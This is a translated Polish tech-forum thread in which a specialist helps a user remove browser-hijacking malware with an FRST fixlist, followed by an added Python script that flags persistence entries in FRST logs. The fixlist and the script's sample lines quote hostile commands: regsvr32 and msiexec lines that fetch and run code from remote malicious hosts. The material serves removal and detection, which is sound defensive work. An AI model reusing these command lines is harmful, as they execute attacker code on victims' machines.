Elektroda.pl

Infected laptop - luckystarting

bedrejczuk 21 Apr 2017 11:59 966 4
  • #1 21 Apr 2017 11:59
    bedrejczuk
    Level 4

    Hello,
    I'm asking for help removing a virus from my laptop; it has got to the point where it opens whatever pages it wants. Because of that I scanned the computer with Dr Web Scanner, then Malware, and made logs with FRST. Please help me analyse the logs and remove the virus. All files and reports are packed in a rar.

  • #2 21 Apr 2017 12:07
    Kolobos
    Computer specialist

    Export your bookmarks from Firefox; the script will delete the profile folder (the one created by the infection).

    Uninstall: McAfee Security Scan Plus

    Next to frst.exe create a file Fixlist.txt with the following contents:
    CloseProcesses:
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATTENTION
    Task: {6D31CE49-CBC6-4F45-BA0F-FD366A07AE27} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== scrobj.dll
    Task: {A1667C12-3949-44F6-BE90-8160CF407CE1} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== scrobj.dll
    Task: {EC400738-2B64-4613-866A-8D1741C4EA12} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] ()
    Shortcut: C:\Users\Dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)
    (kitty.exe) C:\Users\Dell\AppData\Local\Kitty\cat.exe
    (© 2015 Microsoft Corporation) C:\Users\Dell\AppData\Local\Microsoft\BingSvc\BingSvc.exe
    (McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\Run: [BingSvc] => C:\Users\Dell\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-13] (© 2015 Microsoft Corporation)
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== /q
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: E - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: F - F:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {3df96bca-effe-11e5-9613-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {5d960f97-7b00-11e5-be33-8c705a0dc170} - F:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {5d960fa4-7b00-11e5-be33-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {69808fb6-d6f6-11e5-b9b2-001e101fe5e1} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {7f5edf78-5928-11e5-83c3-001e101f8ed0} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {80b3ffed-7d4a-11e5-95a4-001e101f8aaa} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {8a016b49-ef7c-11e5-8fef-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {8a016b55-ef7c-11e5-8fef-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {96fe5e6b-8587-11e5-a5cc-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {981fabab-d00e-11e5-9221-001e101f79c9} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {981fabb8-d00e-11e5-9221-001e101f79c9} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {981fabc2-d00e-11e5-9221-001e101f79c9} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {b3449d4b-5942-11e5-8ff1-001e101f9843} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c0a24e8f-5892-11e5-911f-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c0a24ea2-5892-11e5-911f-8c705a0dc170} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c21afc0c-f336-11e5-92f8-8c705a0dc170} - F:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {c32fcf67-7af3-11e5-8eea-001e101f82a0} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {d174648c-d3dc-11e5-b931-001e101f4da1} - E:\AutoRun.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {d35bbbd1-4e85-11e6-8be8-001e101faa49} - E:\Lenovo_Suite.exe
    HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: {f5f001a0-56e1-11e6-8673-d4bed96deec3} - E:\Startme.exe
    IFEO\DisplaySwitch.exe: [Debugger]
    IFEO\taskmgr.exe: [Debugger]
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2017-04-08]
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\SSScheduler.exe (McAfee, Inc.)
    FF ProfilePath: C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default [2017-04-18]
    FF Extension: (HSearch) - C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [File not signed]
    FF Extension: (FF Adr) - C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [File not signed]
    FF SearchPlugin: C:\Users\Dell\AppData\Roaming\Firefox\Firefox\Profiles\43f75wsa.default\searchplugins\startsearch.xml [2017-04-17]
    R2 Kitty; C:\Users\Dell\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [File not signed]
    S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)
    R2 WinSAPSvc; C:\Users\Dell\AppData\Roaming\WinSAPSvc\WinSAP.dll [494592 2017-04-20] (winsap) [File not signed]
    S3 ewusbmbb; system32\DRIVERS\ewusbwwan.sys [X]
    S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
    S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
    S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
    2017-04-21 08:49 - 2017-04-21 08:49 - 00000000 _____ C:\Windows\SysWOW64\22
    2017-04-21 08:49 - 2017-04-21 08:49 - 00000000 _____ C:\Windows\SysWOW64\11
    2017-04-17 20:41 - 2017-04-21 10:17 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-04-17 20:41 - 2017-04-21 09:07 - 00000023 _____ C:\Users\Public\Documents\temp.dat
    2017-04-17 20:41 - 2017-04-17 20:41 - 00001890 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Roaming\Firefox
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Local\Kitty
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Local\Firefox
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Users\Dell\AppData\Local\Eastness
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\ProgramData\Software
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-04-17 20:41 - 2017-04-17 20:41 - 00000000 ____D C:\Program Files (x86)\Eastness
    2017-04-17 20:40 - 2017-04-20 11:06 - 00003552 _____ C:\Windows\System32\Tasks\Milimili
    2017-04-17 20:40 - 2017-04-20 11:06 - 00000000 ____D C:\Users\Dell\AppData\Roaming\WinSAPSvc
    2017-04-17 20:40 - 2017-04-17 20:40 - 00000000 ____D C:\Users\Dell\AppData\Local\SNARE
    2017-04-17 20:40 - 2017-04-17 20:40 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-04-13 20:07 - 2017-04-13 20:08 - 00003574 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
    2017-04-13 20:07 - 2017-04-13 20:07 - 00000000 ____D C:\Users\Dell\AppData\Roaming\SSMgre
    2017-04-10 12:19 - 2017-04-13 20:08 - 00003564 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
    2017-04-08 18:01 - 2015-11-21 19:02 - 00000000 ____D C:\Program Files\McAfee Security Scan
    2017-04-08 18:01 - 2015-09-11 18:01 - 00001964 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
    2016-03-25 10:56 - 2016-03-25 10:56 - 6493696 _____ () C:\Users\Dell\AppData\Roaming\agent.dat
    2016-03-25 10:53 - 2016-03-25 10:53 - 0127488 _____ () C:\Users\Dell\AppData\Roaming\Installer.dat
    2016-03-25 10:56 - 2016-03-25 10:56 - 0018432 _____ () C:\Users\Dell\AppData\Roaming\Main.dat
    EmptyTemp:

    In FRST, click Fix.

    Once it has finished, post new FRST scan logs.

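
The entries in the fixlist above are the lines a responder should spot first in an FRST log: a scheduled task running `Regsvr32.exe /s /i:<URL> scrobj.dll` (the scriptlet is fetched at run time, so a file scanner has nothing on disk to flag), the Winlogon `[Shell]` value chained to `msiexec.exe /i <URL> /q`, IFEO `[Debugger]` keys on taskmgr.exe and DisplaySwitch.exe, unsigned services running from the user's AppData, stale MountPoints2 AutoRun.exe handlers, and every Chrome shortcut re-pointed at a copy under `C:\Program Files (x86)\Eastness`. The Python script below is an added example for this thread, not part of FRST or of what Kolobos posted: it runs a set of rule checks over FRST-style lines and reports what each one tripped. The sample lines are copied from the fixlist above (the Kitty service line kept with the Polish "[Brak podpisu cyfrowego]" marker, the WinSAP line rewritten with the English "[File not signed]" marker to show both are recognised) plus one constructed, benign GoogleUpdate task line; the rule names, regexes and function names are my own.

```python
"""Triage FRST (Farbar Recovery Scan Tool) log lines for the persistence
tricks removed in the fixlist above. Added example, not part of FRST."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line: str


# FRST service line: "R2 Name; C:\path\file.exe [size date] (Company) [File not signed]"
SERVICE_RE = re.compile(r"^[RS]\d\s+[^;]+;\s+(?P<path>[A-Za-z]:\\[^\[]+?)\s+\[")
# Winlogon Shell value as FRST prints it: "...\Policies\system: [Shell] <value>"
SHELL_RE = re.compile(r"\[Shell\]\s+(?P<value>.+?)\s*$", re.I)
# "Shortcut: X.lnk -> C:\...\chrome.exe (Company)"
SHORTCUT_RE = re.compile(
    r"^Shortcut:.*\.lnk\s+->\s+(?P<target>[A-Za-z]:\\.*?\\(?:chrome|firefox)\.exe)", re.I)
# FRST marks unsigned binaries; Polish-locale wording from this thread plus the English one
UNSIGNED_RE = re.compile(r"\[(?:File not signed|Brak podpisu cyfrowego)\]")


def rule_regsvr32_scriptlet(line: str) -> bool:
    # "regsvr32 /s /i:<URL> scrobj.dll" makes the scriptlet handler fetch and run a
    # remote .sct file. FRST defangs URLs as hxxp://, so accept both spellings.
    return re.search(r"regsvr32(?:\.exe)?\b.*?/i:(?:hxxp|http)s?://.*\bscrobj\.dll",
                     line, re.I) is not None


def rule_winlogon_shell(line: str) -> bool:
    # The only legitimate Shell value is "explorer.exe"; anything appended after a
    # comma is started at every logon (here: msiexec /i <URL> /q).
    m = SHELL_RE.search(line)
    return m is not None and m.group("value").strip().lower() != "explorer.exe"


def rule_ifeo_debugger(line: str) -> bool:
    # An IFEO Debugger value makes Windows launch the "debugger" instead of the
    # named program; used here against taskmgr.exe and DisplaySwitch.exe.
    return line.startswith("IFEO\\") and "[Debugger]" in line


def rule_service_in_profile(line: str) -> bool:
    # Services normally live under Program Files / System32, not under a user's AppData.
    m = SERVICE_RE.match(line)
    return m is not None and re.search(r"\\Users\\[^\\]+\\AppData\\",
                                       m.group("path"), re.I) is not None


def rule_service_unsigned(line: str) -> bool:
    return SERVICE_RE.match(line) is not None and UNSIGNED_RE.search(line) is not None


def rule_mountpoints_autorun(line: str) -> bool:
    # Leftover autorun handlers for removable drives (E:\AutoRun.exe etc.)
    return "MountPoints2:" in line and re.search(r"\\autorun\.exe$", line, re.I) is not None


def rule_browser_shortcut_redirect(line: str) -> bool:
    # A genuine, Google-signed chrome.exe copied to an odd folder with every shortcut
    # re-pointed at it is how the infection kept control of the browser.
    m = SHORTCUT_RE.match(line)
    if m is None:
        return False
    target = m.group("target").lower()
    return not (r"\google\chrome\application\chrome.exe" in target
                or r"\mozilla firefox\firefox.exe" in target)


RULES = [
    ("regsvr32 loads a remote scriptlet via scrobj.dll", rule_regsvr32_scriptlet),
    ("Winlogon Shell is not plain explorer.exe", rule_winlogon_shell),
    ("IFEO Debugger set (process hijack)", rule_ifeo_debugger),
    ("service binary inside a user profile", rule_service_in_profile),
    ("service binary unsigned", rule_service_unsigned),
    ("MountPoints2 AutoRun.exe entry", rule_mountpoints_autorun),
    ("browser shortcut points outside the vendor install path", rule_browser_shortcut_redirect),
]


def triage(lines):
    """Return one Finding per (line, rule) pair that fires; a line can trip several rules."""
    findings = []
    for raw in lines:
        line = raw.strip()
        for name, pred in RULES:
            if pred(line):
                findings.append(Finding(name, line))
    return findings


def flagged_lines(lines):
    return sorted({f.line for f in triage(lines)})


# Sample input: lines from the fixlist above, plus one constructed benign task line (last).
SAMPLE_LINES = [
    r"Task: {6D31CE49-CBC6-4F45-BA0F-FD366A07AE27} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== scrobj.dll",
    r"HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj85RkY2MjMxMdE8MdZYMWI2OTwyFTRQMjkdFdM3NdJYMc== /q",
    r"IFEO\taskmgr.exe: [Debugger]",
    r"R2 Kitty; C:\Users\Dell\AppData\Local\Kitty\cat.exe [357376 2017-04-14] (kitty.exe) [Brak podpisu cyfrowego]",
    r"R2 WinSAPSvc; C:\Users\Dell\AppData\Roaming\WinSAPSvc\WinSAP.dll [494592 2017-04-20] (winsap) [File not signed]",
    r"HKU\S-1-5-21-3786669421-767851228-3943137293-1000\...\MountPoints2: E - E:\AutoRun.exe",
    r"Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.)",
    r"S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.523\McCHSvc.exe [404376 2017-03-20] (McAfee, Inc.)",
    # constructed benign line, not from the thread
    r"Task: {11111111-2222-3333-4444-555555555555} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler (Google Inc.)",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"[{f.rule}] {f.line[:90]}")
```

Running it flags the seven malicious lines (the two AppData services trip both the profile-path and the unsigned-binary rules) and leaves the McAfee service and the constructed GoogleUpdate task alone. The rules are deliberately narrow: a script like this is for ordering what to look at in a log, and the fixlist itself should still be written and reviewed by hand, as it was in this thread.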
  • #3 21 Apr 2017 13:05
    bedrejczuk
    Level 4

    I imported the bookmarks from Chrome; in Firefox there was a start page I didn't recognise and none of my bookmarks. I uninstalled Avast. After the whole process finished and the computer restarted, the Chrome browser got uninstalled. I'm sending new logs.

  • #4 21 Apr 2017 13:46
    Kolobos
    Computer specialist

    That was a Chrome "installed" by the infection, which is why it had to disappear.

    New Fixlist.txt for FRST:
    S2 SNARE; C:\Users\Dell\AppData\Local\SNARE\Snarer.dll [X]

    Once it has finished, delete the C:\FRST folder and that's it.

  • #5 21 Apr 2017 16:23
    bedrejczuk
    Level 4

    Thank you very much. Everything works!
